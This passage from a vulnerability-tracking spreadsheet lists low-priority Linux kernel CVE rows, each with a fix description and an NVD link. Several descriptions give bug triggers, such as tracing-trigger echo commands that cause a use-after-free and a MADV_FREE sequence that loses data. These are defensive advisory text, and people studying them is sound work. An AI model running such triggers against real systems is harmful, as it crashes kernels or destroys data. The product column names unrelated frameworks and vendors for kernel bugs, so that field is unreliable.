hist_data-&gt;fields[] only after the modifier checks have run:
	hist_field = parse_expr(hist_data, file, field_str, flags, var_name,
				&amp;n_subexprs);
	...
	if (hist_field-&gt;flags &amp; HIST_FIELD_FL_VAR) {
		if (hist_field-&gt;flags &amp; (...))
			goto err;
	} else {
		if (hist_field-&gt;flags &amp; (...))
			goto err;
	}
	hist_data-&gt;fields[val_idx] = hist_field;
Both checks jump past that store, and the err label returns without
freeing anything. The error unwinds to create_hist_data(), which calls
destroy_hist_data() -&gt; destroy_hist_fields(), and that reaches a field
only by walking fields[]. A field that never got there is unreachable.
commit e0213434fe3e ("tracing: Do not let histogram values have some
modifiers") set ret to -EINVAL and fell through to the store, which left
the field owned by fields[] and freed along with the rest of hist_data.
Splitting the check into a value case and a variable case replaced that
fall-through with a goto that skips it.
With CONFIG_DEBUG_KMEMLEAK, 200 writes of
  # echo 'hist:keys=prev_pid:vals=next_pid.log2' &gt; \
	 events/sched/sched_switch/trigger
each correctly rejected with -EINVAL, leave 332 unreferenced objects
(63744 bytes) reported at create_hist_field(); 200 install and remove
cycles of a valid trigger leave none. A '.log2' field is two
allocations, since create_hist_field() puts the plain field in
operands[0] of the log2 field, and both are reported.
Use destroy_hist_field() rather than __destroy_hist_field() so that
operands[0] is freed as well. It returns early for HIST_FIELD_FL_VAR_REF,
which is what an operand owned by hist_data-&gt;var_refs[] needs; the
rejected field itself is never a var ref, because a var ref never carries
a modifier flag.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97921</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97922</t>
        </is>
      </c>
      <c r="D299" s="5" t="inlineStr"/>
      <c r="E299" s="5" t="inlineStr"/>
      <c r="F299" s="5" t="inlineStr"/>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr"/>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram var refs regardless of how often they are referenced
Using the same variable three or more times in one hist trigger leaks the
variable reference and its strings when the trigger is removed.
commit 656fe2ba85e8 ("tracing: Use hist trigger's var_ref array to destroy
var_refs") made a trigger's var_refs[] array the only owner of a var ref:
destroy_hist_field() returns early for HIST_FIELD_FL_VAR_REF, so the field
expressions never destroy one. One entry, freed once, no count needed.
commit 8bcebc77e85f ("tracing: Fix histogram code when expression has same
var as value") then made repeated references share one object and added a
count of them. Only the increment side exists, since those expressions
still return early and never drop a reference, so __destroy_hist_field()
sees how many references were created rather than how many are left. It
frees when the decremented count is 0 or 1, so two references work and
three or more leak.
Sharing kept one array entry per object, and create_var_ref() searches and
appends within a single trigger, so nothing outside it holds the object.
Removing a trigger whose variables are still referenced is already refused
by check_var_refs() with -EBUSY. Drop the count and free unconditionally.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97922</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97925</t>
        </is>
      </c>
      <c r="D300" s="5" t="inlineStr"/>
      <c r="E300" s="5" t="inlineStr"/>
      <c r="F300" s="5" t="inlineStr"/>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr"/>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tick/broadcast: Plug clockevents replacement race
朱恺乾 reported and decoded the following race condition when a broadcast
device is replaced:
CPUA					CPUB
 __tick_broadcast_oneshot_control()
   bc = tick_broadcast_device.evtdev;
					tick_install_broadcast_device(dev)
        				clockevents_exchange_device(cur, dev)
					   shutdown(cur);
					   detach(cur);
					   cur-&gt;handler = noop;
					   tick_broadcast_device.evtdev = dev;
  tick_broadcast_set_event(bc, next_event); &lt;- FAIL: arms a detached device.
If the original broadcast device has a restricted interrupt affinity mask
and the last CPU in that mask goes offline then the BUG() in
tick_cleanup_dead_cpu() triggers because the clockevent device is not in
detached state.
The reason for this is that tick_install_broadcast_device() is not
serialized vs. tick broadcast operations.
The obvious cure is to serialize tick_install_broadcast_device() with
tick_broadcast_lock against a concurrent tick broadcast operation.
That requires to split clockevents_exchange_device() into two parts, one
which does the exchange, shutdown and detach operation and the other which
drops the module reference count. This is required because the module
reference cannot be dropped while holding tick_broadcast_lock.
Let clockevents_exchange_device() do both operations as before, but let the
broadcast device code take the two step approach and do the device
exchange under tick_broadcast_lock and drop the module reference count
after releasing it.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97925</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97927</t>
        </is>
      </c>
      <c r="D301" s="5" t="inlineStr"/>
      <c r="E301" s="5" t="inlineStr"/>
      <c r="F301" s="5" t="inlineStr"/>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr"/>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ufs: create the root dentry after loading cylinder metadata
ufs_fill_super() installed sb-&gt;s_root before it loaded the cylinder
group structures for a writable mount:
	sb-&gt;s_root = d_make_root(inode);
	...
	if (!sb_rdonly(sb))
		if (!ufs_read_cylinder_structures(sb))
			goto failed;
When ufs_read_cylinder_structures() failed, the error path freed the
in-core superblock information and set sb-&gt;s_fs_info to NULL while
sb-&gt;s_root stayed installed. get_tree_bdev() then reached
deactivate_locked_super(), and because s_root was present,
generic_shutdown_super() called sync_filesystem() and the put_super
operation. Both dereference UFS_SB(sb), which is now NULL, so a mount
that fails only while reading the cylinder groups oopses during
teardown. A crafted image whose first cylinder group cannot be read
reaches this path.
Load the cylinder group metadata first and create the root dentry last,
so the superblock is published to the VFS only once it is fully set up.
ufs_setup_cstotal() and ufs_read_cylinder_structures() take only the
super_block and do not use the root inode, so the reordering is safe.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97927</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97928</t>
        </is>
      </c>
      <c r="D302" s="5" t="inlineStr"/>
      <c r="E302" s="5" t="inlineStr"/>
      <c r="F302" s="5" t="inlineStr"/>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr"/>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: skip the VMID 0 flush for VRAM
Clear-on-release only runs on VRAM, which amdgpu_ttm_map_buffer() reaches
via its direct MC address without programming a GART window, yet the wipe
still forces a VMID 0 flush. On GFX11 (e.g. Navi33) that spurious SDMA
flush can wedge the engine; only flush when a GART window is actually used.
v2: Let amdgpu_ttm_map_buffer() return whether the VMID 0 flush is needed,
    and drive the clear and copy paths from that. (Christian)
v3: Make the vm_needs_flush output parameter mandatory instead of
    allowing NULL. (Christian)
(cherry picked from commit a306e406e570b74318ff7d80e5b07b540ca1d3a9)</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97928</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97935</t>
        </is>
      </c>
      <c r="D303" s="5" t="inlineStr"/>
      <c r="E303" s="5" t="inlineStr"/>
      <c r="F303" s="5" t="inlineStr"/>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr"/>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Set the trace clock before registering the histogram trigger
hist_register_trigger() puts the trigger on the global named_triggers
list in cmd_ops-&gt;init(), and only then sets the trace clock:
	if (data-&gt;cmd_ops-&gt;init) {
		ret = data-&gt;cmd_ops-&gt;init(data);
		if (ret &lt; 0)
			goto out;
	}
	if (hist_data-&gt;enable_timestamps) {
		ret = tracing_set_clock(file-&gt;tr, hist_data-&gt;attrs-&gt;clock);
		if (ret) {
			hist_err(tr, HIST_ERR_SET_CLOCK_FAIL, errpos(clock));
			goto out;
		}
The clock string is not checked anywhere before that call, so a named
trigger using common_timestamp with an unknown clock fails after it has
already become findable. event_hist_trigger_parse() then frees it
without taking it off the list, and the next lookup by name reads the
freed object:
 ~# cd /sys/kernel/tracing/events/sched/sched_switch
 ~# echo 'hist:name=foo:keys=common_pid:ts=common_timestamp:clock=bogus' &gt; trigger
 bash: echo: write error: Invalid argument
 ~# echo 'hist:name=foo:keys=common_pid' &gt; trigger
  BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
  Read of size 8 at addr ffff88800915d760 by task init/1
   find_named_trigger+0xac/0xc0
   hist_register_trigger+0xc1/0x900
   event_hist_trigger_parse+0x3146/0x6af0
   event_trigger_write+0xce/0x160
  Freed by task 63:
   kfree+0x154/0x420
   trigger_kthread_fn+0xfd/0x160
Set the clock before the trigger is registered, so that nothing which
can fail runs after it is published, the way commit 6f86bdeab633
("tracing: Fix bad hist from corrupting named_triggers list") moved the
registration below the rest of the setup.
tracing_set_filter_buffering() is reference counted, so the init failure
path has to drop the reference that the clock block now takes first.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97935</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97938</t>
        </is>
      </c>
      <c r="D304" s="5" t="inlineStr"/>
      <c r="E304" s="5" t="inlineStr"/>
      <c r="F304" s="5" t="inlineStr"/>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr"/>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
reboot: fix cad_pid use-after-free race
cad_pid is a single kernel-wide struct pid pointer. proc_do_cad_pid()
reads it and passes it to pid_vnr() without protecting the lifetime of
the referenced struct pid. A concurrent writer can replace cad_pid and
drop the final reference to the old struct pid after the reader has
loaded the pointer but before pid_vnr() has finished dereferencing it,
causing a use-after-free.
kill_cad_pid() has the same lifetime race when it passes cad_pid to
kill_pid().
At the time this issue was reported, an unprivileged user could reach the
sysctl through user and PID namespaces because cad_pid was registered in
pid_table[]. Moving cad_pid back to the global reboot sysctl table
corrected that namespace and permission mismatch, but did not fix the
underlying lifetime race.
Fix this by treating cad_pid as an RCU-protected pointer at both read
sites and by waiting for a grace period before dropping the old reference
on the write side.
call_rcu(&amp;old_pid-&gt;rcu, ...) cannot be used here because free_pid()
also queues pid-&gt;rcu; queueing the same rcu_head twice can corrupt the
RCU callback list.
Original KASAN crash stack:
  kernel/pid.c:545 pid_nr_ns()        # reads freed pid-&gt;level
  kernel/pid.c:556 pid_vnr()          # calls pid_nr_ns()
  kernel/pid.c:775 proc_do_cad_pid()  # calls pid_vnr(cad_pid)</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97938</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97942</t>
        </is>
      </c>
      <c r="D305" s="5" t="inlineStr"/>
      <c r="E305" s="5" t="inlineStr"/>
      <c r="F305" s="5" t="inlineStr"/>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr"/>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/alternatives: Exclude text poking against change_page_attr()
From time to time, the following BUG can be observed
in the x86 alternatives patching code [0]:
  &gt; kernel BUG at arch/x86/kernel/alternative.c:2576!
  &gt; Oops: invalid opcode: 0000 [#1] SMP NOPTI
  &gt; CPU: 0 UID: 0 PID: 355 Comm: (udev-worker) Not tainted 7.1.3-1-default #1 PREEMPT(full) openSUSE Tumbleweed  8c1795b03ec64f997e57a8ad38b1161e3b98da64
  &gt; Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS unknown 02/02/2022
  &gt; RIP: 0010:__text_poke+0x2aa/0x450
  &gt; Call Trace:
  &gt;  &lt;TASK&gt;
  &gt;  smp_text_poke_batch_finish+0x2a7/0x320
  &gt;  __static_call_transform+0xb7/0x220
  &gt;  arch_static_call_transform+0x5b/0xb0
  &gt;  __static_call_init+0xe9/0x270
  &gt;  static_call_module_notify+0x11f/0x150
  &gt;  notifier_call_chain+0x61/0xe0
  &gt;  blocking_notifier_call_chain_robust+0x63/0xc0
  &gt;  load_module+0x1c92/0x20c0
  &gt;  init_module_from_file+0xd8/0x140
  &gt;  idempotent_init_module+0x100/0x2f0
  &gt;  __x64_sys_finit_module+0x71/0xe0
  &gt;  do_syscall_64+0xe1/0x610
  &gt;  entry_SYSCALL_64_after_hwframe+0x76/0x7e
which matches the following BUG_ON() in alternative.c:
	/*
	 * If something went wrong, crash and burn since recovery paths are not
	 * implemented.
	 */
	BUG_ON(!pages[0] || (cross_page_boundary &amp;&amp; !pages[1]));
This can happen if vmalloc_to_page() fails, for any reason. Such can happen
if text poking races with CPA, which can possibly result in the collapsing
of page tables (or breaking of PMD hugepages). It is not a problem for most
users of vmalloc_to_page() (they solely own the vmalloc'd range) but, when
CONFIG_ARCH_HAS_EXECMEM_ROX=y, various modules own a single execmem vmalloc
range, and can call set_memory_*() in parallel on it. This can happen to
race against __text_poke and cause havoc in vmalloc_to_page().
Fix it by excluding against CPA using the init_mm mmap read lock.
[ dhansen: Fix up SoB ordering. The actual code flow here was:
	   Pedro=&gt;Lorenzo=&gt;Mike=&gt;Me which is reflected in the SoB chain
	   now. I *believe* Mike simply picked up Lorenzo's update to
	   Pedro's post from the Link ]</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97942</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97945</t>
        </is>
      </c>
      <c r="D306" s="5" t="inlineStr"/>
      <c r="E306" s="5" t="inlineStr"/>
      <c r="F306" s="5" t="inlineStr"/>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr"/>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm: Fix user-space data loss with MADV_FREE and THP
Some of users of Polars (a data analytics library) have lost production
data from this bug. They seem to have just the right combination of
huge pages, MADV_FREE and heavy reclaim pressure.
pmd_modify() masks the old value with (_HPAGE_CHG_MASK &amp; ~_PAGE_DIRTY),
silently discarding the hardware dirty bit.  The subsequent
pmd_mksaveddirty() call is supposed to transfer _PAGE_DIRTY into
_PAGE_SAVED_DIRTY when write-protecting, but the dirty bit was already
stripped from the value, so there is nothing left to transfer.
Contrast with pte_modify(), which keeps _PAGE_DIRTY_BITS in its mask,
and pud_modify(), which keeps _HPAGE_CHG_MASK untouched: pmd_modify()
is the odd one out.  Any pmd_modify() on a writable, dirty PMD loses
the dirty state.
One visible consequence is data loss with MADV_FREE on PMD-mapped THP:
    memset(buf, 0x5A, size);          // PMD-mapped THP, PMD dirty
    madvise(buf, size, MADV_FREE);    // PMD cleaned but left writable,
                                      // folio marked lazyfree
    memset(buf, 0x5A, size);          // hardware sets _PAGE_DIRTY again
    mprotect(buf, size, PROT_READ);   // pmd_modify() drops the dirty bit
    mprotect(buf, size, PROT_READ|PROT_WRITE);
    // ... memory pressure ...
Reclaim (e.g. under memcg pressure) then finds the lazyfree folio with
no dirty bit set anywhere and frees it in
__discard_anon_folio_pmd_locked(), even though the data was rewritten
after MADV_FREE; subsequent reads fault in fresh zero pages.  NUMA
hinting alone can trigger the same loss, as do_huge_pmd_numa_page()
restores the PMD through pmd_modify() as well.
PMD-mapped file THPs are affected too: mprotect()/NUMA hinting dropping
the dirty bit means rewritten data is never written back.
Fix it by keeping _PAGE_DIRTY in the preserved mask, exactly like
pte_modify() and pud_modify() do.  The existing
pmd_mksaveddirty()/pmd_clear_saveddirty() pair then performs the
hardware-dirty &lt;-&gt; saved-dirty transition based on the write bit,
preserving the shadow-stack encoding rules.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97945</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97946</t>
        </is>
      </c>
      <c r="D307" s="5" t="inlineStr"/>
      <c r="E307" s="5" t="inlineStr"/>
      <c r="F307" s="5" t="inlineStr"/>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>tempo, go</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr"/>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/amd_node: Fix PCI device reference counting in amd_smn_init()
The local "root" pointer is a temporary variable used during the device
search. Therefore, refcount related to the search iterators should be cleaned
up after the search is complete.
Use the __free() cleanup macro to ensure the refcount is decremented when the
temporary pointer goes out of scope.
Additionally, increment the refcount when caching a root pointer. This ensures
the in-use refcount is separate from the temporary search refcounting.
Finally, drop the redundant "root = NULL" before the second search loop. The
pci_get_class() iterator always decrements the refcount of its "from"
argument, so the first loop can only fall through with "root" already NULL.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97946</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97947</t>
        </is>
      </c>
      <c r="D308" s="5" t="inlineStr"/>
      <c r="E308" s="5" t="inlineStr"/>
      <c r="F308" s="5" t="inlineStr"/>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr"/>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/amd_node: Fix potential NULL pointer dereference
amd_smn_read/write() are exported functions around __amd_smn_rw(), so
they are always available even if amd_smn_init() fails. In that case,
'amd_roots' is NULL and __amd_smn_rw() will access uninitialized memory.
Then, commit:
  83518453074d ("x86/amd_node: Add SMN offsets to exclusive region access")
added the 'smn_exclusive' flag, which indicated the calls to
pci_request_config_region_exclusive() succeeded, to prevent
concurrent userspace access.
Commit:
  0a4b61d9c2e4 ("x86/amd_node: Fix AMD root device caching")
re-ordered initialization so pci_request_config_region_exclusive() is
called earlier and a failure exits amd_smn_init() before allocating
'amd_roots'. The setting of 'smn_exclusive' moved to the end of
amd_smn_init(), after 'amd_roots' is allocated. It became redundant
and can be removed.
Replace 'smn_exclusive' with directly checking 'amd_roots', to fix a
potential NULL pointer dereference and to simplify the logic.
  [ bp: Reorg commit message, touchup comment. ]
  [ mingo: Rebase &amp; further touchups. ]</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97947</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97948</t>
        </is>
      </c>
      <c r="D309" s="5" t="inlineStr"/>
      <c r="E309" s="5" t="inlineStr"/>
      <c r="F309" s="5" t="inlineStr"/>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr"/>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/eeh: Fix recursive locking on devices without EEH sensitive driver
The commit 1010b4c012b0 ("powerpc/eeh: Make EEH driver device hotplug
safe") refactored the EEH code such that the pci_rescan_remove_lock is
held at the beginning of eeh_handle_normal_event() and the
eeh_reset_device() is called with that lock being held. Looks like the
commit missed to remove the existing lock/unlock inside eeh_rmv_device()
which is no longer necessary. This is causing the eehd to hang on the
lock which it actually holds when that code path is taken.
